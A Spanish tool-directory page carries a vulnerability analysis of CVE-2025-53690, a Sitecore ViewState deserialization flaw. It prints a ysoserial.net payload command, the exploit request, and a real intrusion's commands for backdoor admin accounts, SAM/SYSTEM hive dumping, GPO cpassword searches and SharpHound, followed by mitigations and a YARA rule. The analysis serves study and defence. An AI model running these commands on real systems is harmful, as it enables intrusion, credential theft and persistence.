Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAnálisis ForenseAnálisis de MalwarePruebas de PenetraciónAprendizaje y EducaciónRed TeamingRespuesta a Incidentes
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

Estos son los documentos de análisis de CVE-2025-53690.

34hace 1 añoAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-53690: Análisis de la vulnerabilidad de deserialización de ViewState en Sitecore

Resumen

CVE-2025-53690 es una vulnerabilidad de deserialización de ViewState descubierta en la familia de productos Sitecore. Al explotar una machine key de ASP.NET expuesta, permite la ejecución remota de código, lo que la convierte en una vulnerabilidad de seguridad crítica.

Información básica

  • CVE ID: CVE-2025-53690
  • Puntuación CVSS: 9.0 (Crítico)
  • Tipo de vulnerabilidad: Deserialization of Untrusted Data (CWE-502)
  • Fecha de descubrimiento: septiembre de 2025
  • Fecha de divulgación: 3 de septiembre de 2025
  • Explotación real: explotada como zero-day desde diciembre de 2024

Productos afectados

  • Sitecore Experience Manager (XM) - todas las versiones hasta la 9.0
  • Sitecore Experience Platform (XP) - todas las versiones hasta la 9.0
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Módulo de Active Directory 1.4 e inferiores

Análisis detallado de la vulnerabilidad

Causa raíz

El núcleo de esta vulnerabilidad radica en una gestión de configuración incorrecta:

  1. Uso de una machine key de ejemplo: la machine key de ASP.NET de muestra incluida en la guía de implementación de Sitecore anterior a 2017 se utilizó tal cual en entornos de producción.
  2. Reutilización de claves estáticas: la misma machine key se reutilizó en múltiples implementaciones.
  3. Omisión de la validación de ViewState: la clave expuesta permite eludir la verificación de integridad de ViewState.

Mecanismo de ViewState en ASP.NET

ViewState es una función de gestión de estado de ASP.NET que:

  • Almacena el estado de la página web en el campo oculto __VIEWSTATE.
  • Garantiza la integridad y la confidencialidad mediante la machine key.
  • El servidor deserializa el ViewState para restaurar el estado de la página.
root@kitploit:~
<!-- web.config 예시 -->
<system.web>
    <machineKey 
        validationKey="[64바이트 키]"
        decryptionKey="[48바이트 키]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

Vector de ataque

1. Identificación del endpoint vulnerable

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
특징: 인증 없이 접근 가능, ViewState 사용

2. Generación del payload malicioso de ViewState

El atacante genera un payload malicioso utilizando la machine key conocida y ysoserial.net:

root@kitploit:~
# ysoserial.net 사용 예시
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[키]" --validationalg="HMACSHA256" --decryptionkey="[키]" --decryptionalg="AES"

3. Envío de la solicitud HTTP

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[악성_페이로드]&__VIEWSTATEGENERATOR=[값]

Análisis de un caso de ataque real (informe de Mandiant)

Ciclo de vida del ataque

Fase 1: Infiltración inicial

  • Endpoint: /sitecore/blocked.aspx
  • Método: ataque de deserialización de ViewState
  • Permisos: NETWORK SERVICE (proceso de trabajo de IIS)
  • Payload: herramienta de reconocimiento WEEPSTEEL

Fase 2: Reconocimiento y establecimiento de un punto de apoyo

root@kitploit:~
# 실행된 명령들
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

Herramientas desplegadas:

  • 7za.exe: herramienta de compresión de archivos
  • lfe.ico: herramienta de tunelización de red EARTHWORM
  • 1.vbs: VBScript para la ejecución de comandos

Fase 3: Escalada de privilegios

root@kitploit:~
# 로컬 관리자 계정 생성
net user asp$ [패스워드] /add
net localgroup administrators asp$ /add

net user sawadmin [패스워드] /add  
net localgroup administrators sawadmin /add

Recopilación de credenciales:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Fase 4: Persistencia

  • Acceso RDP: uso de las cuentas de administrador creadas
  • DWAGENT: instalación de una herramienta de acceso remoto (registro del servicio con permisos de SYSTEM)
  • Cambios en la configuración de la cuenta:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Fase 5: Reconocimiento interno

root@kitploit:~
# Domain Controller 식별
nltest /DCLIST:[domain]
nslookup [domain-controller]

# GPO에서 cpassword 검색 (Group Policy Preferences 공격)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# BloodHound/SharpHound 실행
sh.exe -c all

Fase 6: Movimiento lateral

  • Acceso RDP a otros sistemas mediante la cuenta de administrador de dominio comprometida
  • Omisión de la seguridad mediante la tunelización de red a través de EARTHWORM

Análisis de las herramientas utilizadas

WEEPSTEEL (herramienta de reconocimiento)

root@kitploit:~
// 수집하는 정보
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

Forma de salida: ocultación de datos disfrazados como ViewState

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES 암호화 + base64 인코딩된 출력}" />

EARTHWORM (tunelización de red)

  • Funcionalidad de servidor proxy SOCKS v5
  • Omisión de cortafuegos y ocultación de tráfico
  • Evasión de la detección mediante la tunelización del tráfico RDP

DWAGENT (acceso remoto)

  • Herramienta legítima de administración remota
  • Registro del servicio con permisos de SYSTEM
  • Persistencia mediante el inicio automático

SHARPHOUND (reconocimiento de AD)

  • Herramienta de recopilación de datos para BloodHound
  • Mapeo del entorno de Active Directory
  • Identificación de rutas de ataque

Defensa y medidas de mitigación

Acciones inmediatas

root@kitploit:~
<!-- 고유한 machine key 생성 -->
<machineKey 
    validationKey="[새로운_64바이트_키]"
    decryptionKey="[새로운_48바이트_키]"
    validation="HMACSHA256" 
    decryption="AES" />

Medidas para reforzar la seguridad

  1. Rotación automatizada de claves
  2. Activación de la verificación MAC de ViewState
  3. Cifrado de los archivos de configuración
  4. Segmentación de la red
  5. Refuerzo de la monitorización

Reglas de detección

root@kitploit:~
# YARA 규칙 예시 (WEEPSTEEL 탐지)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

Conclusión

CVE-2025-53690 es un ejemplo representativo de cómo un simple error de configuración puede convertirse en una amenaza de seguridad crítica. A través de esta vulnerabilidad, los estudiantes pueden experimentar el ciclo de vida completo de un ataque APT real y comprender las técnicas de ataque modernas y las estrategias de defensa.

Referencias

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
Descargar herramienta